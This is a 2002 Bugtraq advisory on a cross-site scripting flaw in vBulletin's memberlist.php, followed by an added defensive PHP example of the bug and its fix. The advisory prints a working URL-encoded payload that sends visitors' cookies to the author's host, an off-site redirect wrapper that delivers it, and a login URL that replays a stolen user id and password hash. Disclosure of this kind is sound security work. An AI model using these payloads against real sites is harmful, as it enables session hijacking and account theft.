Subject: memberlist.php of vBulletin
From: <plato@swgmotu.com>
To: <bugtraq@securityfocus.com>
Date: Thu, 21 Mar 2002 19:26:36 -0500
vBulletin ALL versions
Vendor status: notified 3/18/2; no response

Within the first few lines of code in memberlist.php, the variable
$letterbits is evaled. Because of the way PHP initializes variables, we can
inject HTML, or JavaScript into the document. So by directing a user to,
for example:

http://www.vbulletin.com/forum/memberlist.php?letterbits=%3Cscript%3Elocation%3D%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%2Ephp%3Fcook%3D%27%2Bescape%28document%2Ecookie%29%3C%2Fscript%3E

(vbulletin.com has apparently patched their installation somehow), I can
steal the user's password hash and user id. Because of the way vB parses
urls, the above will not function inside the forum, but if we put this in
an off-site html file:
<script>
location = "http://www.vbulletin.com/forum/memberlist.php?letterbits=%3Cscript%3Elocation%3D%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%2Ephp%3Fcook%3D%27%2Bescape%28document%2Ecookie%29%3C%2Fscript%3E"
</script>
and then link to it instead, the exploit will work as intended...the user
doesn't even have to be aware of what has transpired...the above link will
proceed first to the memberlist w/cookie stealing code, and then to my
<shameless plug>Star Wars Galaxies Player Association's homepage.
http://www.swgmotu.com</shameless plug>

With the recorded user id and password hash, we can access the site:
http://www.vbulletin.com/forum/index.php?bbuserid=[user id]&bbpassword=[password hash]

I have tried this successfully on five other users besides myself (all with
consent).

I believe the simplest fix would be to initialize letterbits ($letterbits =
"";) at the top of memberlist.php.

~Plato
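As an added illustration, not code from the advisory or from vBulletin, the PHP below reproduces the shape of the bug described above and the fix the author proposes: a variable that is only assigned on some code paths is interpolated into an eval'd template, and a request parameter of the same name pre-seeds it. Under PHP 4's register_globals every request parameter became a PHP variable before the script ran; here extract() on a constructed parameter array stands in for that. The function names, the constructed request array and the A-C letter list are assumptions for the example; register_globals, extract() and eval() are real PHP features.

```php
<?php
// Added example, not vBulletin's code. Reproduces the advisory's pattern:
// a variable assigned only on some branches, interpolated in an eval'd
// template, with register_globals pre-seeding it from the request.
// extract() on a constructed array stands in for register_globals here.

// Constructed request: the attacker-controlled parameter named in the
// advisory, carrying a harmless payload for demonstration.
$REQUEST_PARAMS = ['letterbits' => '<script>document.title = "injected";</script>'];

/** The legitimate content the page is meant to produce (A-C only, for brevity). */
function buildLetterBits(): string
{
    $bits = '';
    foreach (range('A', 'C') as $letter) {
        $bits .= '<a href="memberlist.php?ltr=' . $letter . '">' . $letter . '</a> ';
    }
    return rtrim($bits);
}

/**
 * Vulnerable shape. $letterbits is never initialized, so when $showLetters
 * is false the value seeded by register_globals reaches the template verbatim.
 */
function renderVulnerable(array $params, bool $showLetters): string
{
    extract($params);                            // simulates register_globals
    if ($showLetters) {
        $letterbits = buildLetterBits();
    }
    // Template evaluated the way the advisory describes ($letterbits is evaled).
    $template = '"<div class=\"letters\">$letterbits</div>"';
    eval('$html = ' . $template . ';');
    return $html;
}

/**
 * Hardened shape: the fix the advisory proposes. Assigning $letterbits = ""
 * before any branch runs discards whatever register_globals put there.
 */
function renderHardened(array $params, bool $showLetters): string
{
    extract($params);                            // register_globals still on...
    $letterbits = '';                            // ...but the variable is reset first
    if ($showLetters) {
        $letterbits = buildLetterBits();
    }
    $template = '"<div class=\"letters\">$letterbits</div>"';
    eval('$html = ' . $template . ';');
    return $html;
}

// With $showLetters false the vulnerable render echoes the injected tag
// inside the div; the hardened render produces an empty div. With it true
// both produce the A-C links, and the request parameter has no effect.
echo "vulnerable: " . renderVulnerable($REQUEST_PARAMS, false) . "\n";
echo "hardened:   " . renderHardened($REQUEST_PARAMS, false) . "\n";
echo "normal:     " . renderHardened($REQUEST_PARAMS, true) . "\n";
```

Run it with `php example.php`. Initializing the variable is the narrow fix for this one path; the durable defenses are turning register_globals off, reading request data explicitly from $_GET, and passing anything request-derived through htmlspecialchars() before it reaches markup, so that a template built by eval() can never receive raw user input in the first place.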